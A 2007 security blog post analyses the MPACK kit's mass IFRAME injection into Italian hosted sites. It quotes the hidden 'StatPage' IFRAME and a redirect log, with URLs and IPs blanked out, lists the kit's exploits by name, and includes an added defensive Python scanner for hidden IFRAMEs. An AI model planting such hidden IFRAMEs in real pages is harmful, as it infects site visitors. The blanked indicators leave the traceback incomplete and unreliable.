Wednesday, June 20, 2007

Massive Embedded Web Attack in Italy

The Web is abuzz with news stories regarding the MPACK web exploitation kit installed on over 10,000 mostly Italian based sites, and in the spirit of previous analyses of malicious URLs here's an overview of the strategy of the attack, the outcome, and the IPs in question, thus the ones that should get blacklisted or have CYBERINT applied for further juicy details on the severity of the attack.

The strategy of the attack
Picture yourself in the position of a malicious attacker wanting to infect the highest number of PCs possible in the shortest timeframe. How would you go about infecting the highest possible proportion of internet surfers using outdated software, the ones still living in the "don't open .exe attachments" self-vigilance world? You'll either figure out a way to exploit vulnerabilities within a huge number of web sites and automatically embed the malicious payload, or breach a shared hosting provider and infect all of its customers, thus potentially infecting all of their future visitors. Which is exactly what happened in the most recent case of what's turning into a massive epidemic of MPACK embedded sites.

The outcome of the attack
- Over 10,000 sites affected according to WebSense
- hundreds of thousands of PCs currently infected according to obtained MPACK statistics
- the majority of infected PCs are located in Italy given the breach of the shared hosting provider Aruba

Dissecting the attack
It all started when popular Italian sites had the following IFRAME embedded within their front pages :

<iframe name='StatPage' src='hllp://' width=5 height=5>
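As an added example (not from the original post or from any of the vendors it cites), a small Python scanner that flags the kind of tiny or hidden IFRAME described above, so a site owner can check their own pages for this injection pattern; the page content and host names in the sample are constructed placeholders.

```python
from html.parser import HTMLParser

# Constructed sample page (not a capture): an injected 5x5 "StatPage"
# iframe of the kind described above, next to a legitimate embedded video
# and a second iframe hidden through CSS instead of size.
SAMPLE_HTML = """<html><body>
<h1>Benvenuti</h1>
<iframe name='StatPage' src='http://redirector.example/mp/' width=5 height=5></iframe>
<iframe src="http://video.example/embed/42" width="640" height="360"></iframe>
<iframe src="http://stats.example/p.php" style="display:none"></iframe>
</body></html>"""


class HiddenIframeFinder(HTMLParser):
    """Collect iframes sized or styled so that a visitor cannot see them."""

    MAX_PX = 10  # an iframe this small or smaller is effectively invisible

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "").strip() for k, v in attrs}
        reasons = []
        for dim in ("width", "height"):
            try:
                if int(a.get(dim, "").rstrip("px")) <= self.MAX_PX:
                    reasons.append(f"{dim}={a[dim]}")
            except ValueError:
                pass  # missing or non-numeric dimension: not tiny by itself
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via style")
        if reasons:
            self.findings.append({"src": a.get("src", ""),
                                  "name": a.get("name", ""),
                                  "reasons": reasons})


def find_hidden_iframes(html):
    """Return the list of suspicious iframes found in an HTML string."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    return parser.findings


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML):
        print(f"{f['src']!r} ({', '.join(f['reasons'])})")
```

Run it over each page served from a hosting account; any hit pointing at a host the site does not control is worth pulling the redirect chain for, as done below.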

The entire attack is currently orbiting around the following IPs :

Input URL:
Effective URL: hllp://
Responding IP:
HTTP/1.1 302 Moved Temporarily
Server: nginx/0.5.17
Date: Tue, 19 Jun 2007 22:56:01 GMT
Content-Type: text/html
Content-Length: 161
Connection: keep-alive
Location: hllp://

More coverage :
ISC, Symantec, WebSense, TrendMicro, Finjan -- great to see they came across my analysis of as well -- PandaLabs.


MPACK's Builder Screenshot courtesy of Symantec. Meanwhile, here are the exploits available in the latest 0.90 release of the web exploitation kit :

- modified MS06-014
- MS06-006 Firefox 1.5.x Opera 7.x
- 0day Win2000 (ms06-044)
- XML overflow under XP2k3
- WebViewFolderIcon overflow
- WinZip ActiveX overflow
- QuickTime overflow
- ANI overflow

The majority of news articles I came across are emphasizing that the kit is available for sale at $1000. True, but only if you're purchasing it from the original source; the kit has been a commodity for quite a while, with different parties modifying the source code and selling it for much less, or even bargaining with it if someone's interested in the related underground services on offer.

Even more ironic in the case of this particular attack is that while performing the cyber forensics part, I came across another malicious site farm hosting dialers courtesy of CARPEDIEM. And while the IFRAME part of the massive embedded Italy based attack was gone at the time of checking the dialers, even previous instances of CoolWebSearch were still in place. The second malicious campaign is run via, campaign id = 15682, all the p0rn sites at which is hosting all the dialers-embedded sites in question. From another perspective, the benefit of infecting a web site farm run on a single IP, with probably hundreds of thousands of visitors, in the shortest timeframe possible has a major flaw: blocking aka CARPEDIEM, which as a matter of fact is listed by Google as a harmful site, will temporarily mitigate the threat.

Initiating traceback of a site that's participating in two malicious campaigns :

1 -> hllp://
Responding IP:

2 -> Sites spreading the dialers within :

Responding IP:

Dynamics of infection :

Basically, the host name is identical to the distributed .exe's name:

My_Param['rf'] = "AnalReamV2KTU";
My_Param['id_produit'] = 550;
My_Param['id_site'] = 995;
My_Param['synergie'] = 'h';
My_Param['color'] = 'fire';
My_Param['name_kit'] = "AnalReam.exe";

Here's the entire campaign list :

Situational awareness at its best is what truly matters at the bottom line.